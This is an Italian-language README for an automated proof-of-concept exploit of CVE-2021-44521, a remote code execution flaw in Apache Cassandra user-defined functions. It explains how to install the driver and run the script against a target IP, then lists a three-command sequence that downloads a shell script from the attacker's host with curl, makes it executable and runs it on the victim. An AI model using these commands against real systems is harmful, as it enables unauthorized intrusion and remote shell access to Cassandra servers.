
Proof-of-concept automatizzato per CVE-2021-44521, che consente l'esecuzione remota di codice su Apache Cassandra tramite funzioni definite dall'utente. Esegue comandi arbitrari sull'IP di destinazione.
PoC automatizzato di CVE-2021-44521 Crediti al PoC originale: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
Nota che non puoi eseguire più di un comando alla volta, né utilizzare pipe per ora. Quindi esegui
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"